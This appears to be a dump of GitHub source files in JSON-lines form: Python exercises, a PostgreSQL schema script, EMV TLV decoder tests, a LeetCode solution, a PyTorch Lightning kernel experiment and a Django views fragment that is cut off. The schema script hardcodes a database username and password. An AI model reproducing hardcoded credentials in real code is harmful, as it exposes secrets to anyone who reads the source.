      origin_account.value -= amount\n                dest_account.transfer(amount)\n                return True\n        return False\n\n    def fix_account(self, p) -> bool:\n        \"\"\"\n        fix the corrupted account\n        @account: int(id) or str(name) of the account\n        @return True if success, False if an error occurred\n        \"\"\"\n\n        account = self.get_account(p)\n\n        if isinstance(account, Account):\n            if account.is_corrupted():\n                attributes = list(account.__dict__.keys())\n                if 'name' not in attributes:\n                    account.__dict__.update({'name': p})\n                if 'value' not in attributes:\n                    account.__dict__.update({'value': 0})\n                if 'zip' not in attributes:\n                    account.__dict__.update({'zip': ''})\n                if 'addr' not in attributes:\n                    account.__dict__.update({'addr': ''})\n\n                for attr in attributes:\n                    if attr.startswith('b'):\n                        tmp = attr\n                        while tmp.startswith('b'):\n                            tmp = tmp[1:]\n                        account.__dict__[tmp] = account.__dict__[attr]\n                        del account.__dict__[attr]\n\n                if 
account.__dict__.__len__() % 2 == 0:\n return False\n\n if account.is_corrupted():\n return False\n return True\n","repo_name":"m0saan/42-AI-Bootcamp","sub_path":"module01/ex06/the_bank.py","file_name":"the_bank.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"19563729330","text":"from turtle import *\nfrom ex3 import draw_square\ndef draw_square(length,c):\n color(c)\n shape(\"turtle\")\n speed(0)\n for x in range(4):\n forward(length)\n left(90)\n\nfor i in range(30):\n draw_square(i * 5, 'red')\n left(17)\n penup()\n forward(i * 2)\n pendown()\n\nmainloop()\n","repo_name":"chung3011/tranngocbaochung-fundamental-c4e17","sub_path":"session6/homework/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"5442020251","text":"#! /usr/bin/env python3\r\nimport psycopg2\r\nimport sys\r\n\r\ndef main():\r\n\r\n #Connect to database\r\n conn = psycopg2.connect(\"dbname=apps2018data user=apps2018 password=hoser23709\")\r\n\r\n #Create cursor and insert values to user table.\r\n cur = conn.cursor()\r\n\r\n #User table\r\n #Primary key: userID\r\n cur.execute(\"CREATE TABLE users( \\\r\n userID int, \\\r\n password varchar NOT NULL, \\\r\n salt varchar NOT NULL, \\\r\n\t dob date NOT NULL, \\\r\n\t gender varchar NOT NULL, \\\r\n creationDateServer timestamp with time zone DEFAULT CURRENT_TIMESTAMP, \\\r\n CONSTRAINT users_pk PRIMARY KEY (userID) \\\r\n );\")\r\n\r\n #foodImages table\r\n #Primary Key: submissionID\r\n #Foreign Key: userID\r\n cur.execute(\"CREATE TABLE foodImages( \\\r\n submissionID uuid, \\\r\n userID int NOT NULL, \\\r\n isProcessed bool NOT NULL, \\\r\n imagePath varchar NOT NULL, \\\r\n imageType varchar NOT NULL, \\\r\n latitude real NOT NULL, \\\r\n longitude real NOT NULL, \\\r\n captureDateClient timestamp with time zone NOT NULL, \\\r\n resultPath varchar, \\\r\n classifier varchar, \\\r\n accuracy real, \\\r\n creationDateServer timestamp with time zone DEFAULT CURRENT_TIMESTAMP, \\\r\n CONSTRAINT foodImages_pk PRIMARY KEY (submissionID) \\\r\n );\")\r\n\r\n #ocrImages table\r\n #Primary Key: submissionID\r\n #Foreign Key: userID\r\n cur.execute(\"CREATE TABLE ocrImages( \\\r\n submissionID uuid, \\\r\n userID int NOT NULL, \\\r\n isProcessed bool NOT NULL, \\\r\n imagePath varchar NOT NULL, \\\r\n imageType varchar NOT NULL, \\\r\n latitude real NOT NULL, \\\r\n longitude real NOT NULL, \\\r\n captureDateClient timestamp with time zone NOT NULL, \\\r\n resultPath varchar, \\\r\n creationDateServer timestamp with time zone DEFAULT CURRENT_TIMESTAMP, \\\r\n CONSTRAINT ocrImages_pk PRIMARY KEY (submissionID) \\\r\n );\")\r\n\r\n #barcodes table\r\n #Primary Key: submissionID\r\n #Foreign Key: userID\r\n cur.execute(\"CREATE TABLE barcodes( \\\r\n submissionID uuid, \\\r\n userID int NOT NULL, \\\r\n barcode int NOT NULL, \\\r\n latitude real NOT NULL, \\\r\n longitude real NOT NULL, \\\r\n angle real, \\\r\n captureDateClient timestamp with time zone NOT NULL, \\\r\n creationDateServer timestamp with time zone DEFAULT CURRENT_TIMESTAMP, \\\r\n CONSTRAINT barcodes_pk PRIMARY KEY (submissionID) \\\r\n );\")\r\n\r\n #calorieIntake table\r\n #Primary Key: submissionID\r\n #Foreign Key: userID\r\n cur.execute(\"CREATE TABLE calorieIntake( \\\r\n userID int, \\\r\n submissionDate date, \\\r\n calories int NOT NULL, \\\r\n TEE real NOT NULL, \\\r\n 
steps int NOT NULL, \\\r\n weight real NOT NULL, \\\r\n foodCalorieIntake int NOT NULL, \\\r\n captureDateClient timestamp with time zone NOT NULL, \\\r\n creationDateServer timestamp with time zone DEFAULT CURRENT_TIMESTAMP, \\\r\n CONSTRAINT calorieIntake_pk PRIMARY KEY (userID, submissionDate) \\\r\n );\")\r\n\r\n #Inserting foreign keys\r\n cur.execute(\"ALTER TABLE foodImages ADD CONSTRAINT foodImages_fk0 FOREIGN KEY(userID) REFERENCES users(userID) ON DELETE CASCADE; \\\r\n \tALTER TABLE ocrImages ADD CONSTRAINT ocrImages_fk0 FOREIGN KEY(userID) REFERENCES users(userID) ON UPDATE CASCADE ON DELETE CASCADE; \\\r\n ALTER TABLE barcodes ADD CONSTRAINT barcodes_fk0 FOREIGN KEY(userID) REFERENCES users(userID) ON UPDATE CASCADE ON DELETE CASCADE; \\\r\n ALTER TABLE calorieIntake ADD CONSTRAINT calorieintake_fk0 FOREIGN KEY(userID) REFERENCES users(userID) ON UPDATE CASCADE ON DELETE CASCADE\")\r\n\r\n #Commit database changes, close connection\r\n conn.commit()\r\n cur.close()\r\n conn.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"vurhd1/EPICS-APPS-Database-Scripts","sub_path":"DatabaseScripts/Create_Table_Structure.py","file_name":"Create_Table_Structure.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7359306990","text":"import unittest\n\nfrom pyemvtlv.types.tags import *\nfrom pyemvtlv.codec.binary.decoder import decode as pber_dec\nfrom binascii import unhexlify\n\n\nclass TestDecodePBER(unittest.TestCase):\n def test_decode0x91(self):\n input = '910a90ca8abbfee0be240012'\n res, remain = pber_dec(unhexlify(input))\n self.assertEqual(res, IssuerAuthenticationData(hexvalue='90ca8abbfee0be240012'))\n self.assertEqual(remain, b'')\n\n def test_decode0x71(self):\n input = '711e9f1804000000018615842400021022c3089f35064c142447f11fa2ec0aa1'\n res, remain = pber_dec(unhexlify(input))\n self.assertEqual(res, IssuerScriptTemplate1(hexvalue='9f1804000000018615842400021022c3089f35064c142447f11fa2ec0aa1'))\n self.assertEqual(remain, b'')\n\n def test_decode0x8a(self):\n input = '8a023030'\n res, remain = pber_dec(unhexlify(input))\n self.assertEqual(res, AuthorisationResponseCode(hexvalue='3030'))\n self.assertEqual(remain, b'')\n\n def test_chain(self):\n input = '910a90ca8abbfee0be240012711e9f1804000000018615842400021022c3089f35064c142447f11fa2ec0aa18a023030'\n subs = unhexlify(input)\n l = []\n while subs:\n res, subs = pber_dec(subs)\n if res:\n l.append(res)\n self.assertEqual(l, [IssuerAuthenticationData(hexvalue='90ca8abbfee0be240012'),\n IssuerScriptTemplate1(hexvalue='9f1804000000018615842400021022c3089f35064c142447f11fa2ec0aa1'),\n AuthorisationResponseCode(hexvalue='3030')])\n\n def test_shortdecodeV(self):\n input = '8a033030'\n self.assertRaisesRegexp(ValueError, 'Insufficient remaining substrate - 1 bytes short', pber_dec, unhexlify(input))\n\n def test_shortdecodeL(self):\n input = '8a8201'\n self.assertRaisesRegexp(ValueError, 'Short decode on length parsing - 1 bytes short', pber_dec, unhexlify(input))\n\n def test_shortdecodeT(self):\n input = '9f'\n self.assertRaisesRegexp(ValueError, 'Short octet stream on long tag decoding', pber_dec, unhexlify(input))\n\n def test_failfind(self):\n input = '0a0101'\n self.assertRaisesRegexp(ValueError, 'Cannot find tagId A', pber_dec, unhexlify(input))\n\n def test_decodelong(self):\n input = '8a820101' + '00' * 257\n res, remain = pber_dec(unhexlify(input))\n self.assertEqual(res, 
AuthorisationResponseCode(hexvalue='00' * 257))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mmattice/pyemvtlv","sub_path":"test/test_decode_pseudo_ber.py","file_name":"test_decode_pseudo_ber.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"42314374797","text":"# -*- coding:utf-8 -*-\n\n__author__ = 'huanghf'\n\n\"\"\"\n给定一个二叉搜索树,编写一个函数 kthSmallest 来查找其中第 k 个最小的元素。\n\n说明:\n你可以假设 k 总是有效的,1 ≤ k ≤ 二叉搜索树元素个数。\n\n示例 1:\n\n输入: root = [3,1,4,null,2], k = 1\n 3\n / \\\n 1 4\n \\\n 2\n输出: 1\n示例 2:\n\n输入: root = [5,3,6,2,4,null,null,1], k = 3\n 5\n / \\\n 3 6\n / \\\n 2 4\n /\n 1\n输出: 3\n进阶:\n如果二叉搜索树经常被修改(插入/删除操作)并且你需要频繁地查找第 k 小的值,你将如何优化 kthSmallest 函数?\n\"\"\"\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n\n def getinorder(self, root):\n stack = []\n inorder = []\n cur = root\n while stack or cur:\n if cur:\n stack.append(cur)\n cur = cur.left\n else:\n node = stack.pop()\n inorder.append(node.val)\n cur = node.right\n return inorder\n\n def kthSmallest(self, root, k):\n \"\"\"\n :type root: TreeNode\n :type k: int\n :rtype: int\n \"\"\"\n inorder = self.getinorder(root)\n return inorder[k - 1]\n\n def kthSmallest2(self, root, k):\n \"\"\"\n yield骚操作\n :type root: TreeNode\n :type k: int\n :rtype: int\n \"\"\"\n\n def gen(r):\n if r is not None:\n yield from gen(r.left)\n yield r.val\n yield from gen(r.right)\n\n it = gen(root)\n for _ in range(k):\n ans = next(it)\n return ans","repo_name":"lovehhf/LeetCode","sub_path":"230_二叉搜索树中第K小的元素.py","file_name":"230_二叉搜索树中第K小的元素.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"17669990907","text":"import logging\nimport os\nfrom typing import List\nfrom typing import Optional\nfrom typing import Sequence\n\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nimport wandb\nfrom omegaconf import OmegaConf\nfrom pytorch_lightning.loggers import WandbLogger\nfrom torch.nn import Parameter\nfrom torch.utils.data import DataLoader\n\nimport research.code.util as H\nfrom disent.nn.functional import torch_conv2d_channel_wise_fft\nfrom disent.nn.loss.softsort import spearman_rank_loss\nfrom disent.nn.modules import DisentLightningModule\nfrom disent.nn.modules import DisentModule\nfrom disent.util.lightning.callbacks import BaseCallbackPeriodic\nfrom disent.util.lightning.logger_util import wb_log_metrics\nfrom disent.util.seeds import seed\nfrom disent.util.strings.fmt import make_box_str\nfrom experiment.run import hydra_get_callbacks\nfrom experiment.run import hydra_get_gpus\nfrom experiment.run import hydra_make_logger\nfrom experiment.util.hydra_main import hydra_main\nfrom experiment.util.hydra_utils import make_non_strict\n\n\nlog = logging.getLogger(__name__)\n\n\n# ========================================================================= #\n# EXP #\n# ========================================================================= #\n\n\ndef disentangle_loss(\n batch: torch.Tensor,\n aug_batch: Optional[torch.Tensor],\n factors: torch.Tensor,\n num_pairs: int,\n f_idxs: Optional[List[int]] = None,\n loss_fn: str = 'mse',\n mean_dtype=None,\n corr_mode: str = 'improve',\n regularization_strength: float = 1.0,\n factor_sizes: Optional[torch.Tensor] = None, # scale the distances | Must be 
the same approach as `GroundTruthDistSampler`\n) -> torch.Tensor:\n assert len(batch) == len(factors)\n assert batch.ndim == 4\n assert factors.ndim == 2\n # random pairs\n ia, ib = torch.randint(0, len(batch), size=(2, num_pairs), device=batch.device)\n # get pairwise distances\n b_dists = H.pairwise_loss(batch[ia], batch[ib], mode=loss_fn, mean_dtype=mean_dtype) # avoid precision errors\n if aug_batch is not None:\n assert aug_batch.shape == batch.shape\n b_dists += H.pairwise_loss(aug_batch[ia], aug_batch[ib], mode=loss_fn, mean_dtype=mean_dtype)\n # compute factor differences\n if f_idxs is not None:\n f_diffs = factors[ia][:, f_idxs] - factors[ib][:, f_idxs]\n else:\n f_diffs = factors[ia] - factors[ib]\n # scale the factor distances\n if factor_sizes is not None:\n assert factor_sizes.ndim == 1\n assert factor_sizes.shape == factors.shape[1:]\n scale = torch.maximum(torch.ones_like(factor_sizes), factor_sizes - 1)\n f_diffs = f_diffs / scale.detach()\n # compute factor distances\n f_dists = torch.abs(f_diffs).sum(dim=-1)\n # optimise metric\n if corr_mode == 'improve': loss = spearman_rank_loss(b_dists, -f_dists, regularization_strength=regularization_strength) # default one to use!\n elif corr_mode == 'invert': loss = spearman_rank_loss(b_dists, +f_dists, regularization_strength=regularization_strength)\n elif corr_mode == 'none': loss = +torch.abs(spearman_rank_loss(b_dists, -f_dists, regularization_strength=regularization_strength))\n elif corr_mode == 'any': loss = -torch.abs(spearman_rank_loss(b_dists, -f_dists, regularization_strength=regularization_strength))\n else: raise KeyError(f'invalid correlation mode: {repr(corr_mode)}')\n # done!\n return loss\n\n\nclass DisentangleModule(DisentLightningModule):\n\n def __init__(\n self,\n model,\n hparams,\n disentangle_factor_idxs: Sequence[int] = None\n ):\n super().__init__()\n self.model = model\n self.hparams.update(hparams)\n self._disentangle_factors = None if (disentangle_factor_idxs is None) else np.array(disentangle_factor_idxs)\n\n def configure_optimizers(self):\n return H.make_optimizer(self, name=self.hparams.exp.optimizer.name, lr=self.hparams.exp.optimizer.lr, weight_decay=self.hparams.exp.optimizer.weight_decay)\n\n def training_step(self, batch, batch_idx):\n (x,), (f,) = batch['x_targ'], batch['factors']\n # feed forward batch\n y = self.model(x)\n # compute pairwise distances of factors and batch, and optimize to correspond\n loss_rank = disentangle_loss(\n batch = x if self.hparams.exp.train.combined_loss else y,\n aug_batch = y if self.hparams.exp.train.combined_loss else None,\n factors=f,\n num_pairs=int(len(x) * self.hparams.exp.train.pairs_ratio),\n f_idxs=self._disentangle_factors,\n loss_fn=self.hparams.exp.train.loss,\n mean_dtype=torch.float64,\n regularization_strength=self.hparams.exp.train.reg_strength,\n factor_sizes=None,\n )\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n if hasattr(self.model, 'augment_loss'):\n loss_aug = self.model.augment_loss(self)\n else:\n loss_aug = 0\n loss = loss_rank + loss_aug\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n self.log('loss_rank', float(loss_rank), prog_bar=True)\n self.log('loss', float(loss), prog_bar=True)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n return loss\n\n def forward(self, x):\n return self.model(x)\n\n\n# ========================================================================= #\n# MAIN #\n# ========================================================================= #\n\n\n_REPR_FN_INIT = {\n 'none': lambda x: x,\n 'square': lambda x: torch.sqrt(torch.abs(x)),\n 
'abs': lambda x: torch.abs(x),\n 'exp': lambda x: torch.log(torch.abs(x)),\n}\n\n_REPR_FN = {\n 'none': lambda x: x,\n 'square': lambda x: torch.square(x),\n 'abs': lambda x: torch.abs(x),\n 'exp': lambda x: torch.exp(x),\n}\n\n\n\nclass Kernel(DisentModule):\n\n def __init__(\n self,\n radius: int = 33,\n channels: int = 1,\n # loss settings\n train_symmetric_regularise: bool = True,\n train_norm_regularise: bool = True,\n train_nonneg_regularise: bool = True,\n train_regularize_l2_weight: Optional[float] = None,\n # kernel settings\n represent_mode: str = 'abs',\n init_offset: float = 0.0,\n init_scale: float = 0.001,\n init_sums_to_one: bool = True,\n ):\n super().__init__()\n assert channels in (1, 3)\n assert set(_REPR_FN_INIT.keys()) == set(_REPR_FN.keys())\n assert represent_mode in _REPR_FN, f'invalid represent_mode: {repr(represent_mode)}'\n # initialize\n with torch.no_grad():\n # randomly sample value\n if represent_mode == 'none':\n kernel = torch.rand(1, channels, 2*radius+1, 2*radius+1, dtype=torch.float32)\n else:\n kernel = torch.randn(1, channels, 2*radius+1, 2*radius+1, dtype=torch.float32)\n # scale values\n kernel = init_offset + kernel * init_scale\n if init_sums_to_one:\n kernel = kernel / kernel.sum(dim=[-1, -2], keepdim=True)\n # log params\n kernel = _REPR_FN_INIT[represent_mode](kernel)\n assert not torch.any(torch.isnan(kernel))\n # store\n self.__kernel = Parameter(kernel)\n self._represent_mode = represent_mode\n # regularise options\n self._train_symmetric_regularise = train_symmetric_regularise\n self._train_norm_regularise = train_norm_regularise\n self._train_nonneg_regularise = train_nonneg_regularise\n self._train_regularize_l2_weight = train_regularize_l2_weight\n\n @property\n def kernel(self) -> torch.Tensor:\n return _REPR_FN[self._represent_mode](self.__kernel)\n\n def forward(self, xs):\n return torch_conv2d_channel_wise_fft(xs, self.kernel)\n\n def make_train_periodic_callback(self, cfg, dataset) -> BaseCallbackPeriodic:\n class ImShowCallback(BaseCallbackPeriodic):\n def do_step(self, trainer: pl.Trainer, pl_module: pl.LightningModule):\n # get kernel image\n img_kernel = H.to_img(pl_module.model.kernel[0], scale=True).numpy()\n img_kernel_log = H.to_img(torch.log(pl_module.model.kernel[0]), scale=True).numpy()\n # augment function\n def augment_fn(batch):\n return H.to_imgs(pl_module.forward(batch.to(pl_module.device)), scale=True)\n # get augmented traversals\n with torch.no_grad():\n orig_wandb_image, orig_wandb_animation = H.visualize_dataset_traversal(dataset, augment_fn=None, data_mode='raw', output_wandb=True) # dataset returns (numpy?) 
HWC batches\n augm_wandb_image, augm_wandb_animation = H.visualize_dataset_traversal(dataset, augment_fn=augment_fn, data_mode='input', output_wandb=True) # dataset returns (tensor) CHW batches\n # log images to WANDB\n wb_log_metrics(trainer.logger, {\n 'kernel': wandb.Image(img_kernel),\n 'kernel_ln': wandb.Image(img_kernel_log),\n 'traversal_img_orig': orig_wandb_image, 'traversal_animation_orig': orig_wandb_animation,\n 'traversal_img_augm': augm_wandb_image, 'traversal_animation_augm': augm_wandb_animation,\n })\n return ImShowCallback(every_n_steps=cfg.exp.out.show_every_n_steps, begin_first_step=True)\n\n def augment_loss(self, framework: DisentLightningModule):\n augment_loss = 0\n # symmetric loss\n if self._train_symmetric_regularise:\n k, kt = self.kernel[0], torch.transpose(self.kernel[0], -1, -2)\n loss_symmetric = 0\n loss_symmetric += H.unreduced_loss(torch.flip(k, dims=[-1]), k, mode='mae').mean()\n loss_symmetric += H.unreduced_loss(torch.flip(k, dims=[-2]), k, mode='mae').mean()\n loss_symmetric += H.unreduced_loss(torch.flip(k, dims=[-1]), kt, mode='mae').mean()\n loss_symmetric += H.unreduced_loss(torch.flip(k, dims=[-2]), kt, mode='mae').mean()\n # log loss\n framework.log('loss_sym', float(loss_symmetric), prog_bar=True)\n # final loss\n augment_loss += loss_symmetric\n # regularize, try make kernel as small as possible\n if (self._train_regularize_l2_weight is not None) and (self._train_regularize_l2_weight > 0):\n k = self.kernel[0]\n loss_l2 = self._train_regularize_l2_weight * (k ** 2).mean()\n framework.log('loss_l2', float(loss_l2), prog_bar=True)\n augment_loss += loss_l2\n # sum of 1 loss, per channel\n if self._train_norm_regularise:\n k = self.kernel[0]\n # sum over W & H resulting in: (C, W, H) -> (C,)\n channel_sums = k.sum(dim=[-1, -2])\n channel_loss = H.unreduced_loss(channel_sums, torch.ones_like(channel_sums), mode='mse')\n norm_loss = channel_loss.mean()\n # log loss\n framework.log('loss_norm', float(norm_loss), prog_bar=True)\n # final loss\n augment_loss += norm_loss\n # no negatives regulariser\n if self._train_nonneg_regularise:\n k = self.kernel[0]\n nonneg_loss = torch.abs(k[k < 0].sum())\n # log loss\n framework.log('loss_nonneg', float(nonneg_loss), prog_bar=True)\n # regularise negatives\n augment_loss += nonneg_loss\n # stats\n framework.log('kernel_mean', float(self.kernel.mean()), prog_bar=False)\n framework.log('kernel_std', float(self.kernel.std()), prog_bar=False)\n # return!\n return augment_loss\n\n\n# ========================================================================= #\n# Run Hydra #\n# ========================================================================= #\n\n\ndef run_disentangle_dataset_kernel(cfg):\n cfg = make_non_strict(cfg)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n # TODO: some of this code is duplicated between this and the main experiment run.py\n # check CUDA setting\n cfg.trainer.setdefault('cuda', 'try_cuda')\n gpus = hydra_get_gpus(cfg)\n # CREATE LOGGER\n logger = hydra_make_logger(cfg)\n if isinstance(logger.experiment, WandbLogger):\n _ = logger.experiment # initialize\n # TRAINER CALLBACKS\n callbacks = hydra_get_callbacks(cfg)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n seed(cfg.settings.job.seed)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n # initialise dataset and get factor names to disentangle\n dataset = H.make_dataset(cfg.exp.data.name, factors=True, data_root=cfg.dsettings.storage.data_root)\n disentangle_factor_idxs = dataset.gt_data.normalise_factor_idxs(cfg.exp.kernel.disentangle_factors)\n 
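    # write the resolved factor names back onto the config so the log lines below report names rather than raw indices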
cfg.exp.kernel.disentangle_factors = tuple(dataset.gt_data.factor_names[i] for i in disentangle_factor_idxs)\n log.info(f'Dataset has ground-truth factors: {dataset.gt_data.factor_names}')\n log.info(f'Chosen ground-truth factors are: {tuple(cfg.exp.kernel.disentangle_factors)}')\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n # print everything\n log.info('Final Config' + make_box_str(OmegaConf.to_yaml(cfg)))\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n dataloader = DataLoader(\n dataset,\n batch_sampler=H.StochasticBatchSampler(dataset, batch_size=cfg.datamodule.dataloader.batch_size),\n num_workers=cfg.datamodule.dataloader.num_workers,\n pin_memory=cfg.datamodule.dataloader.pin_memory,\n )\n model = Kernel(radius=cfg.exp.kernel.radius, channels=cfg.exp.kernel.channels, init_offset=cfg.exp.kernel.init_offset, init_scale=cfg.exp.kernel.init_scale, train_symmetric_regularise=cfg.exp.kernel.regularize_symmetric, train_norm_regularise=cfg.exp.kernel.regularize_norm, train_nonneg_regularise=cfg.exp.kernel.regularize_nonneg, represent_mode=cfg.exp.kernel.represent_mode, init_sums_to_one=cfg.exp.kernel.init_sums_to_one, train_regularize_l2_weight=cfg.exp.kernel.regularize_l2_weight)\n callbacks.append(model.make_train_periodic_callback(cfg, dataset=dataset))\n framework = DisentangleModule(model, cfg, disentangle_factor_idxs=disentangle_factor_idxs)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n if logger:\n logger.log_hyperparams(cfg)\n # train\n trainer = pl.Trainer(\n log_every_n_steps=cfg.trainer.log_every_n_steps,\n logger=logger,\n callbacks=callbacks,\n gpus=1 if gpus else 0,\n max_epochs=cfg.trainer.max_epochs,\n max_steps=cfg.trainer.max_steps,\n enable_progress_bar=False,\n # we do this here so we don't run the final metrics\n detect_anomaly=False, # this should only be enabled for debugging torch and finding NaN values, slows down execution, not by much though?\n enable_checkpointing=False,\n )\n trainer.fit(framework, dataloader)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n # save kernel\n if cfg.exp.out.rel_save_dir is not None:\n assert not os.path.isabs(cfg.exp.out.rel_save_dir), f'rel_save_dir must be relative: {repr(cfg.exp.out.rel_save_dir)}'\n save_dir = os.path.join(ROOT_DIR, cfg.exp.out.rel_save_dir)\n assert os.path.isabs(save_dir), f'save_dir must be absolute: {repr(save_dir)}'\n # save kernel\n H.torch_write(os.path.join(save_dir, cfg.exp.out.save_name), framework.model.kernel.cpu().detach())\n\n\n# ========================================================================= #\n# Entry Point #\n# ========================================================================= #\n\n\nif __name__ == '__main__':\n # HYDRA:\n # run experiment (12min * 4*8*2) / 60 ~= 12 hours\n # but speeds up as kernel size decreases, so might be shorter\n # EXP ARGS:\n # $ ... 
-m optimizer.weight_decay=1e-4,0.0 kernel.radius=63,55,47,39,31,23,15,7 dataset.spacing=8,4,2,1\n\n ROOT_DIR = os.path.abspath(__file__ + '/../../../..')\n CONFIGS_THIS_EXP = os.path.abspath(os.path.join(__file__, '..', 'config'))\n CONFIGS_RESEARCH = os.path.abspath(os.path.join(__file__, '../../..', 'config'))\n\n # launch the action\n hydra_main(\n callback=run_disentangle_dataset_kernel,\n config_name='config_adversarial_kernel',\n search_dirs_prepend=[CONFIGS_THIS_EXP, CONFIGS_RESEARCH],\n log_level=logging.INFO,\n )\n","repo_name":"nmichlo/msc-research","sub_path":"research/part03_learnt_overlap/e01_learn_to_disentangle/run_03_train_disentangle_kernel.py","file_name":"run_03_train_disentangle_kernel.py","file_ext":"py","file_size_in_byte":16520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"17830196548","text":"import laserbeam\nfrom os.path import exists, join\n\ndef main():\n\n trainer = laserbeam.Trainer()\n\n\n\n if exists(join(trainer.model_path, \"checkpoint\")):\n trainer.load_checkpoint(join(trainer.model_path, \"checkpoint\", 'epoch069_2020-08-25_14-22-06.pth'))\n #trainer.load_checkpoint()\n\n #print(history, current_epoch)\n #train_model(100,20)\n trainer.evaluate()\n #print(len(datasets['test']))\n #example = trainer.datasets['test'].samples_dataframe.iloc[733]\n #output = trainer.test_single_example(example)\n #print(180.0 * output)\n #print(example)\n \n\n\nif __name__ == '__main__':\n main()\n\n \n","repo_name":"braianps/laserbeam","sub_path":"Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"86"} +{"seq_id":"3834834022","text":"#!/bin/env python\n#coding=utf8\n\ndef get_context_info(readfile):\n if str(type(readfile)).find('str') >= 0:\n inverted_list = open(readfile, 'r')\n else:\n inverted_list = readfile\n\n context_list = {}\n\n for line in inverted_list:\n elements = line.split()\n word = elements[0]\n context_sum = []\n flag1 = 0\n flag2 = 0\n for index in range(1, len(elements)):\n if flag1 == flag2:\n context = []\n remainder = index % 6\n if remainder >= 1 and remainder <= 4:\n context.append(elements[index])\n flag1 += 1\n if remainder == 0:\n flag2 += 4\n context_sum.append(context)\n context_list[word] = context_sum\n\n return context_list\n","repo_name":"teddy-hoo/ReviewSummary","sub_path":"oldcode/get_context.py","file_name":"get_context.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"23261833733","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# ## Day 30 prep\r\n\r\n# In[17]:\r\n\r\n\r\nget_ipython().run_line_magic('matplotlib', 'widget')\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# In[30]:\r\n\r\n\r\nfig1, ax1 = plt.subplots()\r\nx = np.linspace(0,2,100)\r\nax1.plot(x,np.exp(-x))\r\nax1.plot(x,x)\r\n\r\n\r\n# In[18]:\r\n\r\n\r\nx = 1\r\nfor i in range(10):\r\n x = np.exp(-x)\r\n print(x)\r\n\r\n\r\n# In[19]:\r\n\r\n\r\nx = -20\r\nfor i in range(20):\r\n x = np.exp(-x)\r\n print(x)\r\n\r\n\r\n# Let's try a slightly different function though.\r\n# $$x = e^{1-x^2}$$\r\n\r\n# In[28]:\r\n\r\n\r\nx = 10\r\nfor i in range(20):\r\n x = np.exp(1-x**2)\r\n print(x)\r\n\r\n\r\n# The above function doesn't seem so different, and yet the results aren't working. 
Let's plot and see.\r\n\r\n# In[34]:\r\n\r\n\r\nfig0, ax0 = plt.subplots()\r\nt = np.linspace(0,2,100)\r\nax0.plot(t, np.exp(1-t**2))\r\nax0.plot(t,t)\r\n\r\n\r\n# Now the relaxation method doesn't seem to work so well. However, there is an interesting trick we can play with this. Let's solve the problem the other way around.\r\n# \r\n# $$x = e^{1-x^2} \\rightarrow x = \\sqrt{1-\\log{x}}$$\r\n\r\n# In[55]:\r\n\r\n\r\nfig2, ax2 = plt.subplots()\r\nx = np.linspace(0.01,2,100)\r\nax2.plot(x, np.sqrt(1-np.log(x)))\r\nax2.plot(x,x)\r\n\r\n\r\n# In[38]:\r\n\r\n\r\nx = 2\r\nfor i in range(20):\r\n    x = np.sqrt(1-np.log(x))\r\n    print(x)\r\n\r\n\r\n# We can beef up this method slightly to report a result once the answer gets sufficiently close to the \"true\" answer. We can do this by subtraction, for example.\r\n\r\n# In[50]:\r\n\r\n\r\nx = 2\r\ne = 1\r\nwhile abs(e) > 0.0000001:\r\n    x1 = np.sqrt(1-np.log(x))\r\n    e = x1-x\r\n    x = x1\r\nprint(x)\r\n\r\n\r\n# In[47]:\r\n\r\n\r\nx+e\r\n\r\n\r\n# In[ ]:\r\n\r\n\r\n\r\n\r\n","repo_name":"ehremington/ph390","sub_path":"comp-class/develop/post-save-hook/day30-prep.py","file_name":"day30-prep.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"23634433763","text":"import re\r\nfrom django.shortcuts import render, redirect, get_object_or_404, reverse\r\nfrom .models import *\r\nfrom .forms import UserCreationForm, PostForm\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth.models import User\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\nfrom django.contrib.auth.forms import UserCreationForm\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom .forms import CreateUserForm\r\n\r\n# Create your views here.\r\ndef index(request):\r\n    return render(request, 'index.html')\r\n\r\ndef visita(request):\r\n    return render(request, 